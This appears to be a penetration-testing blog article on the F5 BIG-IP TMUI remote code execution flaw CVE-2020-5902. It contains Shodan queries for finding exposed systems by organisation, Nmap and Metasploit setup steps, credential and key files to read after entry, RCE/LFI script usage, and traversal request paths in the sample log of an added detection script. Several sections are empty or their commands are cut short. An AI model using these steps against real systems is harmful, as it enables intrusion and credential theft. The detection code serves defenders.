# Disclaimer

For educational purposes only. This article is directed towards penetration testing and security research. The author accepts no responsibility for illegal use of the information provided.

# Overview

The Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability, tracked as CVE-2020-5902, in undisclosed pages.

# Vulnerable versions:

# BIG IP - Definition

BIG-IP is a family of products covering software and hardware designed around application availability, access control, and security solutions.

  • BIG-IP Local Traffic Manager (LTM) - provides the platform for creating virtual servers, performance, service, protocol, authentication, and security profiles to define and shape your application traffic.

  • BIG-IP DNS - Distributes and secures DNS traffic, advertising your application namespaces.

# Impact - 9.8 Critical

This vulnerability allows unauthenticated attackers with network access to the Configuration utility, through the BIG-IP management port and/or self IPs, to execute arbitrary system commands, create or delete files, and disable services. It may result in a complete system compromise. BIG-IP systems in Appliance mode are also vulnerable. The issue is not exposed on the data plane; only the control plane is affected.

Additional commentary: NVD Info & F5

# Basic exploitation structure

Manipulating the TMUI login URL lets an attacker reach tmshCmd.jsp and fileRead.jsp without authenticating, which opens RCE and LFI attack possibilities respectively.
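The article does not reproduce the manipulated login URL. As an added detection example (my code, not the author's and not F5's), the script below parses web-server access-log lines and flags requests that start at the TMUI login page but, after the normalisation a servlet container applies, land on tmshCmd.jsp or fileRead.jsp. It assumes an Apache/NCSA combined log format, that the login page is at /tmui/login.jsp, and that the manipulation uses a ';' path-parameter segment such as '..;', which containers like Tomcat strip from the raw URI before percent-decoding and collapsing '..' segments; the sample log is constructed, not captured.

```python
"""Added example (not part of the original article): flag access-log entries
that reach the TMUI JSPs named above through a manipulated login URL.

Assumptions (mine, not the article's): combined log format, login page at
/tmui/login.jsp, and a ';' path-parameter traversal that the servlet container
strips before decoding and normalising.  SAMPLE_LOG is constructed.
"""
import re
from typing import List, Optional
from urllib.parse import unquote, urlsplit

LOGIN_PREFIX = "/tmui/login.jsp"                              # assumed entry point
SENSITIVE_JSPS = frozenset({"tmshCmd.jsp", "fileRead.jsp"})   # named in the article

# Minimal combined-log parser: client, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def container_resolve(raw_path: str) -> str:
    """Resolve a request path the way a servlet container such as Tomcat does:
    drop ';...' path parameters from each segment of the *raw* URI, then
    percent-decode, then collapse '.' and '..' segments.  Only a literal ';'
    delimits a path parameter; an encoded '%3b' survives as ordinary data."""
    out: List[str] = []
    for segment in raw_path.split("/"):
        segment = unquote(segment.split(";", 1)[0])
        if segment in ("", "."):
            continue
        if segment == "..":
            if out:
                out.pop()
            continue
        out.append(segment)
    return "/" + "/".join(out)


def classify_target(target: str) -> Optional[str]:
    """'traversal' when a login-prefixed path only resolves to a sensitive JSP
    after container normalisation, 'direct' when the JSP is requested outright,
    None otherwise.  The front-end proxy's handling of the /tmui context prefix
    is not modelled, so the match is on the resolved file name."""
    raw_path = urlsplit(target).path
    resolved = container_resolve(raw_path)
    if resolved.rsplit("/", 1)[-1] not in SENSITIVE_JSPS:
        return None
    # A prefix-based access rule in front of the container sees the literal
    # text; a path that starts at the login page yet ends up at the JSP has
    # slipped past that rule.
    if raw_path != resolved and raw_path.startswith(LOGIN_PREFIX):
        return "traversal"
    return "direct"


def scan_log(lines: str) -> List[dict]:
    """Parse each line and collect findings; lines that do not parse are skipped."""
    findings = []
    for line in lines.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_target(m["target"])
        if verdict:
            findings.append({
                "client": m["client"],
                "target": m["target"],
                "status": int(m["status"]),
                "verdict": verdict,
            })
    return findings


# Constructed sample, not a real capture.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jul/2020:10:00:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120
203.0.113.5 - - [05/Jul/2020:10:00:03 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 200 512
203.0.113.5 - - [05/Jul/2020:10:00:05 +0000] "GET /tmui/login.jsp/%2e%2e;/tmui/locallb/workspace/fileRead.jsp HTTP/1.1" 200 2048
198.51.100.7 - - [05/Jul/2020:10:01:00 +0000] "GET /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 200 900
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['verdict']:9} {f['client']:14} {f['status']} {f['target']}")
```

Run it directly to print the findings. The `direct` verdict is kept separate because an authenticated administrator legitimately reaches those JSPs, whereas a login-prefixed path that only resolves to them after normalisation has bypassed a prefix-based access rule and is the case to alert on. The percent-encoded `%2e%2e;` line shows why the resolver decodes after stripping path parameters rather than matching on the literal string `..;`.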


# Discovering vulnerable systems

Method 1 (Shodan search):
title:"Big-IP®" org:"Organization Name"

Method 2 (Shodan search):
http.title:"BIG-IP®- Redirect" org:"Organization Name"

Additional filters:
country:"" - search by country
city:"" - search by city
net:"" - search by IP address or CIDR range
hostname:"" - locate devices by hostname
Nmap script installation:
cd /usr/share/nmap/scripts && wget

nmap --script=http-vuln-cve2020-5902.nse {IP}
# Add -p443 to scan only the HTTPS port for faster output

# Metasploit module

The Metasploit Framework published a public exploit module for CVE-2020-5902 on July 5th, 2020. Note: because the exploit is so new, using it is not recommended. If you still choose to use it, do so responsibly and at your own risk.

Module installation:
cd /usr/share/metasploit-framework/modules/exploits/linux/http && wget

# Change f5_bigip_tmui_rce.rb permissions in case metasploit throws an error.

# Manual exploitation


# Useful command examples: whoami, uname, pwd
File Read:
# Files to look for: /etc/passwd, /etc/shadow, /home/$USER/.ssh/id_rsa, /config/bigip.conf

Directory listing:
# Directories to look at: /tmp, /home, /root

# Automatic exploitation

An automated Python script for CVE-2020-5902 is already available, allowing attackers to significantly reduce exploitation time.

Python script installation:
git clone

LFI - python3 -t -x lfr -f /etc/passwd
RCE - python3 -t -x rce -a whoami

# Personal thoughts

BIG-IP CVE-2020-5902 is a fresh issue that suddenly hit the cybersecurity world. Some people talk about its great significance, some are just trying to get easy bug bounties. But, in my opinion, this CVE is a product of hard work, which should be treated with respect and appropriately mitigated by those who run the affected systems. I would like to thank all the awesome people who immediately started publishing about the exploit and spread some great awareness. Here is a small list of useful resources to continue monitoring the issue:
